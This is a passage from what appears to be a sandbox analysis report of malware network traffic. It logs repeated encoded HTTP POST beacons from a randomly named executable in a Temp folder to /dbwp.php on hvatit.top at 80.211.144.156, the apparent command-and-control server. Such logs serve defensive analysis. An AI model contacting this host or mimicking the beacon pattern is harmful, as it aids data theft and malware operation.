                                                        Data Ascii: Z\YSZ^PV]_TWT^[PZRYRRUT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z0B<)+67:7Z";$$98$%80.S+?_??4//!]'/Z,=
                                                        Aug 31, 2024 09:33:26.868720055 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:27.065861940 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        92 | 192.168.2.4 | 49829 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:27.193705082 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:27.552376986 CEST | 2560 | OUT | Data Raw: 5a 5c 59 53 5f 59 55 52 5d 5f 54 57 54 5a 5b 50 5a 54 59 5b 52 53 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YS_YUR]_TWTZ[PZTY[RSTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.06(9#>;-(4;$&);'6(3=?+;Y?4,!]'/Z,-
                                                        Aug 31, 2024 09:33:27.864839077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:27.997514009 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        93 | 192.168.2.4 | 49830 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:28.089951038 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        94 | 192.168.2.4 | 49831 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:28.118786097 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:28.474229097 CEST | 2560 | OUT | Data Raw: 5a 5a 59 51 5a 58 50 55 5d 5f 54 57 54 5d 5b 53 5a 5c 59 52 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZYQZXPU]_TWT][SZ\YRRQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0W.?_#6='.;Z400/_0:++=,'S,!]'/Z,1
                                                        Aug 31, 2024 09:33:28.782859087 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:28.983263969 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        95 | 192.168.2.4 | 49832 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:29.118393898 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:29.474225044 CEST | 2552 | OUT | Data Raw: 5f 58 5c 56 5f 59 55 52 5d 5f 54 57 54 58 5b 51 5a 5c 59 5c 52 51 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\V_YUR]_TWTX[QZ\Y\RQTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$.<),T#>,]9<4'+3%[$=%?(;??',?!]'/Z,1
                                                        Aug 31, 2024 09:33:29.893752098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:30.029486895 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        96 | 192.168.2.4 | 49833 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:30.147797108 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:30.505487919 CEST | 2552 | OUT | Data Raw: 5a 54 59 54 5f 5e 55 57 5d 5f 54 57 54 58 5b 52 5a 57 59 5c 52 53 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYT_^UW]_TWTX[RZWY\RST_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.31<*#"8./8 ?'\(U$/^$[:<$(?'U/!]'/Z,=
                                                        Aug 31, 2024 09:33:30.830562115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:31.026269913 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        97 | 192.168.2.4 | 49834 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:31.162514925 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:31.521192074 CEST | 2560 | OUT | Data Raw: 5a 5c 59 50 5f 5a 50 53 5d 5f 54 57 54 5f 5b 53 5a 5d 59 5e 52 51 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YP_ZPS]_TWT_[SZ]Y^RQTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!*=*(S!8.?;[#7&:'3$$-&+(#<,;S./!]'/Z,
                                                        Aug 31, 2024 09:33:31.849621058 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:31.983861923 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        98 | 192.168.2.4 | 49835 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:32.122637987 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:32.474220037 CEST | 2560 | OUT | Data Raw: 5a 5f 59 56 5a 59 55 52 5d 5f 54 57 54 5b 5b 56 5a 5c 59 5c 52 5d 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YVZYUR]_TWT[[VZ\Y\R]TRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y$2*(94V"-<[9$ (S0;&%;0:V(Y?'8!]'/Z,)
                                                        Aug 31, 2024 09:33:32.787709951 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:32.915862083 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        99 | 192.168.2.4 | 49836 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:33.037760019 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        100 | 192.168.2.4 | 49837 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:33.122359991 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:33.474445105 CEST | 1436 | OUT | [request body]
                                                        Aug 31, 2024 09:33:33.786036015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:33.987014055 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        101 | 192.168.2.4 | 49838 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:33.347409010 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:33.693012953 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:34.029907942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:34.163690090 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        102 | 192.168.2.4 | 49839 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:34.286052942 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:34.630570889 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:34.960659027 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:35.089466095 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        103 | 192.168.2.4 | 49840 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:35.213412046 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:35.568140984 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:35.877520084 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:36.007858038 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        104 | 192.168.2.4 | 49841 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:36.131462097 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:36.489836931 CEST | 2552 | OUT | [request body]
                                                        Aug 31, 2024 09:33:36.811660051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:36.933542013 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        105 | 192.168.2.4 | 49842 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:37.054958105 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:37.411792040 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:37.715974092 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:37.847181082 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        106 | 192.168.2.4 | 49843 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:37.978431940 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:38.333641052 CEST | 2552 | OUT | [request body]
                                                        Aug 31, 2024 09:33:38.662533998 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:38.795986891 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        107 | 192.168.2.4 | 49844 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:38.930417061 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        108 | 192.168.2.4 | 49845 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:39.002532959 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:39.349359989 CEST | 1408 | OUT | [request body]
                                                        Aug 31, 2024 09:33:39.668941975 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:39.796642065 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        109 | 192.168.2.4 | 49846 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:39.118405104 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:39.474209070 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:39.802839994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:39.935904026 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        110 | 192.168.2.4 | 49847 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:40.062844038 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:40.411904097 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:40.735538960 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:40.937792063 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        111 | 192.168.2.4 | 49848 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:41.068954945 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:41.427359104 CEST | 2560 | OUT | [request body]
                                                        Aug 31, 2024 09:33:41.754949093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:41.887732029 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        112 | 192.168.2.4 | 49849 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:42.011873960 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:42.365065098 CEST | 2560 | OUT | [request body]
